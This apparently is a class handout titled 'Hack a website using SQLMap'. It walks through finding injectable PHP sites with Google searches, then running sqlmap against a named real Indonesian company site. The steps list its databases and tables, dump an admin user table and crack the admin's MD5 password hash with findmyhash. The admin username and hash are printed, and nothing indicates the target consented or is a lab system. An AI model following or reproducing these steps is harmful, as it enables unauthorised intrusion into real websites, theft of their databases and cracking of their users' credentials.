Scribd
Upload
6 views

SQLMap Hashing

Uploaded by

rendralestiyanto
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
6 views

SQLMap Hashing

Uploaded by

rendralestiyanto
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Hack a website using SQLMap

Objective:

- Finding the websites that have vulnerability.


- Getting the database (focus on user name and password) using sqlmap
- Crack the hashing password

Finding the websites that have vulnerability

1. Log in to backtrack
2. Please do ping to check the internet connectivity.
3. Click on Applications > Backtrack > Vulnerability Assessment > Web Application Assessment
> Web Vulnerability Scanners > sqlmap.
4. Open google to find vulnerable website. Type php?id=1 on the search box. To be easier, it is
better to try website co.id, so type co.id php?id=1
In this class activity, we will use gree.co.id.

5. Click one of them and to check vulnerability type ‘ at the end of url.
http://gree.co.id/profile.php?id=1’

6. If the website shows the error message, it means that the website has vulnerability.
Getting the database (focus on user name and password) using sqlmap

7. Now go back to backtrack and type python sqlmap.py -u http://gree.co.id/profile.php?id=1 - -


dbs

8. If stop at
[13:50:26] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

9. The program will stop and shows the database name:

10. Type: python sqlmap.py -u http://gree.co.id/profile.php?id=1 -D greecoid_dbgree –tables


11. You will get tables:
12. We interested on table: td_user_admin, type: python sqlmap.py -u
http://gree.co.id/profile.php?id=1 -D greecoid_dbgree -T td_user_admin - -columns

13. We will get:


14. Type: python sqlmap.py -u http://gree.co.id/profile.php?id=1 -D greecoid_dbgree -T
td_user_admin - -dump

15. Follow the selection below:


[13:57:09] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'PASSWORD'. Do you want to crack them via a
dictionary-based attack? [Y/n/q] Y

[13:57:27] [INFO] using hash method 'md5_generic_passwd'


what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>1

[13:58:44] [INFO] using default dictionary


[13:58:44] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n

16. We will find hashing password:

Crack the hashing password

17. We find that user name: admin and password: b1dbcc58230e213bbbfcc108a7b4fb68 (hashing).
18. Click on Applications > BackTrack > Privilege Escalation > Password Attacks > Online Attacks
> findmyhash

19. Type: python ./findmyhash.py MD5 -h b1dbcc58230e213bbbfcc108a7b4fb68

20. We will get:

You might also like